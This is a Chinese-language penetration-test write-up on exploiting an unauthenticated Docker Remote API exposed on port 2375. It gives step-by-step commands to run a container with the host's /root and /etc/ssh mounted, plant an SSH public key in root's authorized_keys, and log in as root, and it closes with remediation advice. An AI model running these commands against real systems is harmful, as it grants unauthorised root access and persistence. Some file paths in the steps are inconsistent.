漏洞起因
使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,其实这是 Docker Remote API,可以执行docker命令
漏洞风险
Docker daemon api是使用url代替命令行来操作docker,docker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时,会调用这个api,可以执行docker命令,root权限启动docker情况下可直接可以通过创建容器映射ssh配置文件,配置自己的key公钥,使用root+key私钥连接服务器。
渗透过程
用awvs扫描项目,发现了一个Docker Engine API 无需身份验证即可访问漏洞
浏览器访问一下http://127.0.0.1:2375/info ,确实有东西
随便找一个装有docker的虚拟机连接docker试试,看到了创建的docker容器(ps直接看到内容,说明这个主机的2375是没有ssl验证的,基本满足入侵要求)
powershell
# docker -H tcp://10.20.17.215:2375 ps
获取服务器root权限思路就比较明确了
创建一个容器
映射ssh配置文件目录
进入容器
powershell
# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu先进入容器,检查一下是否启用了root用户
powershell
# cat /tmp/ssh_etc/sshd_config
在自己的机器上生成一对新的key
powershell
# ssh-keygen -t rsa -C "[email protected]"
# Enter file in which to save the key (/root/.ssh/id_rsa): /home/id_rsa
# (其他选项回车即可)
查看/home/id_rsa.pub内容
powershell
# cat /home/id_rsa.pub
在docker容器中注入ssh pub key
powershell
# cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # 这里粘贴你刚刚在自己机器生成的/tmp/id_rsa.pub
>EOF使用生成的/home/id_ras私钥登录服务器
powershell
ssh -i /home/id_rsa [email protected]
至此,拿到目标服务器root账号权限,渗透结束。
修复建议
1.对2375端口做网络访问控制,如ACL控制,或者访问规则;
2.通过CA认证方式使用Remote API,参考:https://docs.docker.com/engine/security/https/